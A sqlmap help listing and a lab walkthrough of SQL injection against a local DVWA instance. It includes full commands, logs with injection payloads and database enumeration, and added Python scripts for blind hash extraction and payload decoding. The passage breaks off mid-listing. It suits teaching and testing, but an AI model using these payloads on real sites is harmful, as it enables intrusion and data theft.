sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

Usage: python ./sqlmap.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be specified to set the source to
    get target urls from.

    -d DIRECT           Direct connection to the database
    -u URL, --url=URL   Target url
    -l LOGFILE          Parse targets from Burp or WebScarab proxy logs
    -m BULKFILE         Scan multiple targets enlisted in a given textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target urls
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target url.

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --cookie-urlencode  URL Encode generated cookie injections
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header
    --referer=REFERER   HTTP Referer header
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
    --auth-cred=ACRED   HTTP authentication credentials (name:password)
    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
    --ignore-proxy      Ignore system default HTTP proxy
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --safe-url=SAFURL   Url address to visit frequently during testing
    --safe-freq=SAFREQ  Test requests between two visits to a given safe url

  Optimization:
    These options can be used to optimize the performance of sqlmap.

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts.

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --os=OS             Force back-end DBMS operating system to this value
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to specify how to parse and compare page
    content from HTTP responses when using blind SQL injection technique.

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (0-3, default 1)
    --string=STRING     String to match in page when the query is valid
    --regexp=REGEXP     Regexp to match in page when the query is valid
    --text-only         Compare pages based only on the textual content

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques.

    --technique=TECH    SQL injection techniques to test for (default BEUST)
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements.

    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART  First query output entry to retrieve
    --stop=LIMITSTOP    Last query output entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell

  Brute force:
    These options can be used to run brute force checks.

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions.

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management
    system underlying file system.

    --file-read=RFILE   Read a file from the back-end DBMS file system
    --file-write=WFILE  Write a local file on the back-end DBMS file system
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system.

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry.

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters.

    -s SESSIONFILE      Save and resume all data retrieved on a session file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behaviour
    --charset=CHARSET   Force character encoding used for data retrieval
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session file for current target
    --fresh-queries     Ignores query results stored in session file
    --save              Save options on a configuration INI file
    --update            Update sqlmap

  Miscellaneous:
    --beep              Alert when sql injection found
    --check-payload     IDS detection testing of injection payloads
    --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
    --forms             Parse and test forms on target url
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --mobile            Imitate smartphone through HTTP User-Agent header
    --page-rank         Display page rank (PR) for Google dork results
    --parse-errors      Parse DBMS error messages from response pages
    --replicate         Replicate dumped data into a sqlite3 database
    --tor               Use default Tor (Vidalia/Privoxy/Polipo) proxy address
    --wizard            Simple wizard interface for beginner users
A minimal invocation, listing the back-end databases through the id GET parameter:

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://localhost/index.php?id=2 --dbs
First attempt against DVWA. The --cookie value is malformed: "Cookie=security=low" is sent as a cookie named "Cookie" whose value is "security=low", so DVWA never receives a "security" cookie, falls back to its default security level and answers with its own Set-Cookie (hence the prompt below). At that level the id parameter is not injectable:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Cookie=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:45:28

[01:45:28] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:45:28] [INFO] testing connection to the target url
[01:45:28] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:45:30] [INFO] testing if GET parameter 'id' is dynamic
[01:45:30] [INFO] confirming that GET parameter 'id' is dynamic
[01:45:31] [INFO] GET parameter 'id' is dynamic
[01:45:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:45:31] [INFO] testing sql injection on GET parameter 'id'
[01:45:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:31] [INFO] testing 'Oracle AND time-based blind'
[01:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:45:33] [WARNING] GET parameter 'id' is not injectable
[01:45:33] [INFO] testing if GET parameter 'Submit' is dynamic
[01:45:33] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:45:33] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:45:33] [INFO] testing sql injection on GET parameter 'Submit'
[01:45:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:34] [INFO] testing 'Oracle AND time-based blind'
[01:45:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:35] [WARNING] GET parameter 'Submit' is not injectable
[01:45:35] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses

[*] shutting down at: 01:45:35
Second attempt. The leading "=" in "=security=low" gives that cookie an empty name, so DVWA still sees no "security" cookie and the outcome is the same:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:46:10

[01:46:10] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:10] [INFO] testing connection to the target url
[01:46:10] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:46:13] [INFO] testing if GET parameter 'id' is dynamic
[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:13] [INFO] GET parameter 'id' is dynamic
[01:46:13] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:46:13] [INFO] testing sql injection on GET parameter 'id'
[01:46:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:14] [INFO] testing 'Oracle AND time-based blind'
[01:46:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:46:16] [WARNING] GET parameter 'id' is not injectable
[01:46:16] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:16] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:16] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:16] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:17] [INFO] testing 'Oracle AND time-based blind'
[01:46:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:18] [WARNING] GET parameter 'Submit' is not injectable
[01:46:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses

[*] shutting down at: 01:46:18
Third attempt, with the Cookie header correctly formed. DVWA now serves the page at security level low, the Set-Cookie prompt does not appear, and sqlmap confirms four techniques on the id parameter. The ten-second pause between 01:46:32 and 01:46:42 is the SLEEP(5) time-based test:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:46:31

[01:46:31] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:31] [INFO] testing connection to the target url
[01:46:31] [INFO] testing if the provided string is within the target URL page content
[01:46:31] [INFO] testing if GET parameter 'id' is dynamic
[01:46:31] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:31] [INFO] GET parameter 'id' is dynamic
[01:46:32] [INFO] heuristics detected web page charset 'ascii'
[01:46:32] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[01:46:32] [INFO] testing sql injection on GET parameter 'id'
[01:46:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:42] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:46:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:42] [INFO] target url appears to be UNION injectable with 2 columns
[01:46:42] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[01:46:45] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:45] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:45] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:45] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:46:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:49] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9643=9643 AND 'KTii'='KTii&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 8718 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,122,58),(SELECT (CASE WHEN (8718=8718) THEN 1 ELSE 0 END)),CHAR(58,107,121,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sDog'='sDog&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,112,120,122,58),IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73) AS CHAR),CHAR(32)),CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'nCjY'='nCjY&Submit=Submit
---
[01:46:49] [INFO] manual usage of GET payloads requires url encoding
[01:46:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:49] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:46:50
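What the boolean-based blind finding above actually buys an attacker, as an added example that is not part of the original post and not sqlmap's own code. The script below stands in for DVWA's sqli page with an in-memory SQLite database (constructed test row; SQLite's unicode(substr(...)) plays the role of MySQL's ASCII(SUBSTRING(...))), uses the same --string="Surname" oracle sqlmap was given, re-closes the quote the way the 'KTii'='KTii tail in the payload does, and recovers a password hash one character at a time. A parameterised version of the same query is included to show that the identical probe leaks nothing from it.

```python
import sqlite3

TRUE_MARKER = "Surname"   # the value given to sqlmap with --string

# Constructed stand-in for DVWA's users table (one row is enough).
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT,
                       user TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 'admin', 'admin',
                              '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def render(rows):
    return "".join(f"<pre>First name: {f}<br>Surname: {l}</pre>" for f, l in rows)


def page_vulnerable(id_param: str) -> str:
    """DVWA 'low' behaviour: the id value is pasted straight into the SQL."""
    sql = ("SELECT first_name, last_name FROM users "
           f"WHERE user_id = '{id_param}'")
    try:
        return render(db.execute(sql).fetchall())
    except sqlite3.Error:
        return "<pre>database error</pre>"   # no 'Surname' here either


def page_safe(id_param: str) -> str:
    """Hardened version: the value is bound as a parameter, never parsed as SQL."""
    rows = db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (id_param,)).fetchall()
    return render(rows)


def oracle(page, condition: str) -> bool:
    """One request's worth of work: inject an AND condition into the id value
    and report whether the --string marker came back. The trailing
    'abcd'='abcd re-closes the quote exactly as sqlmap's 'KTii'='KTii does."""
    payload = f"1' AND ({condition}) AND 'abcd'='abcd"
    return TRUE_MARKER in page(payload)


def extract(page, expression: str, max_len: int = 64) -> str:
    """Recover the value of a SQL expression one character at a time by
    binary search over the code point (7 oracle calls per character).
    SQLite: unicode(substr(x, pos, 1)); MySQL would use ASCII(SUBSTRING(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                                  # code point is in [lo, hi]
            mid = (lo + hi + 1) // 2
            cond = f"unicode(substr(({expression}),{pos},1)) >= {mid}"
            if oracle(page, cond):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:             # substr past the end yields '' -> unicode('') is NULL
            break
        out += chr(lo)
    return out


def demo() -> dict:
    """Extract the admin password hash from the vulnerable page, count the
    requests it took, and check that the same probe leaks nothing from the
    hardened page."""
    counter = {"requests": 0}

    def counted(id_param: str) -> str:
        counter["requests"] += 1
        return page_vulnerable(id_param)

    digest = extract(counted, "SELECT password FROM users WHERE user_id=1")
    return {
        "hash": digest,
        "requests": counter["requests"],
        "safe_page_leaks": oracle(page_safe, "1=1"),
    }


if __name__ == "__main__":
    print(demo())
```

The 32-character hash costs 7 requests per character plus one round of 7 to detect the end of the string, 231 requests in total; that is the order of magnitude behind the "133 HTTP(s) requests" sqlmap reports for detection alone, and why it prefers the UNION and error-based channels when they are available.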
Enumerating the tables of the dvwa database. sqlmap resumes the injection points and the DBMS fingerprint from the session file, so detection costs no new requests ("a total of 0 HTTP(s) requests"); only the enumeration queries are sent:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:46:50

[01:46:50] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:50] [INFO] resuming injection data from session file
[01:46:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:50] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:50] [INFO] manual usage of GET payloads requires url encoding
[01:46:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:50] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:42:45
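Reading the error-based and UNION payloads listed above, as an added example that is not part of the original post and not sqlmap's own code. sqlmap builds its delimiters with CHAR() so that no quote characters are needed inside the injected string; the script decodes those calls, shows the random token the UNION test asks the reflected column to echo, and extracts the value from the kind of MySQL "Duplicate entry" error that the FLOOR(RAND(0)*2) ... GROUP BY construct provokes. The error message is constructed here to match MySQL's format; it was not captured from the DVWA host.

```python
import re
from typing import Optional, Tuple

CHAR_CALL = re.compile(r"CHAR\(((?:\d+,)*\d+)\)")


def decode_char(call: str) -> str:
    """CHAR(58,112,120,122,58) -> ':pxz:' (MySQL CHAR() builds a string from code points)."""
    m = CHAR_CALL.fullmatch(call.strip())
    if not m:
        raise ValueError(f"not a CHAR() call: {call}")
    return "".join(chr(int(n)) for n in m.group(1).split(","))


def decode_all(payload: str) -> str:
    """Rewrite every CHAR(...) in a payload as the literal it produces, for reading."""
    return CHAR_CALL.sub(lambda m: decode_char(m.group(0)), payload)


def markers(payload: str) -> Tuple[str, str]:
    """sqlmap brackets the extracted value with the first and last CHAR() of the payload."""
    calls = CHAR_CALL.findall(payload)
    return decode_char(f"CHAR({calls[0]})"), decode_char(f"CHAR({calls[-1]})")


def union_token(payload: str) -> str:
    """The random string the UNION test asks the reflected column to echo back;
    seeing it between the markers proves which SELECT column reaches the page."""
    calls = CHAR_CALL.findall(payload)
    return decode_char(f"CHAR({calls[1]})")


def extract_between(text: str, prefix: str, suffix: str) -> Optional[str]:
    """What sqlmap does with the response body: take whatever sits between the markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), text, re.S)
    return m.group(1) if m else None


# Payloads copied from the injection-point listing of the first successful run.
ERROR_PAYLOAD = (
    "id=1' AND (SELECT 8718 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,122,58),"
    "(SELECT (CASE WHEN (8718=8718) THEN 1 ELSE 0 END)),CHAR(58,107,121,122,58),"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
    "AND 'sDog'='sDog&Submit=Submit"
)
UNION_PAYLOAD = (
    "id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,112,120,122,58),"
    "IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73) AS CHAR),CHAR(32)),"
    "CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit"
)

# Constructed, not captured from the DVWA host: the error MySQL raises when the
# GROUP BY key built from FLOOR(RAND(0)*2) repeats. The CONCAT() value (marker,
# CASE result, marker) is part of that key, so it is echoed in the message.
SAMPLE_ERROR = "Duplicate entry ':pxz:1:kyz:1' for key 'group_key'"


if __name__ == "__main__":
    print(decode_all(ERROR_PAYLOAD))
    print(union_token(UNION_PAYLOAD),
          extract_between(SAMPLE_ERROR, *markers(ERROR_PAYLOAD)))
```

The "1" between the markers is the result of CASE WHEN (8718=8718), i.e. the confirmation that the injected expression was evaluated; in later requests sqlmap substitutes the expression it wants to read (a version string, a table name) for that CASE and the value comes back through the same channel, one error message per value instead of one request per bit.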
Listing the columns of dvwa.users, again from the saved session:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:46:51

[01:46:51] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:51] [INFO] resuming injection data from session file
[01:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

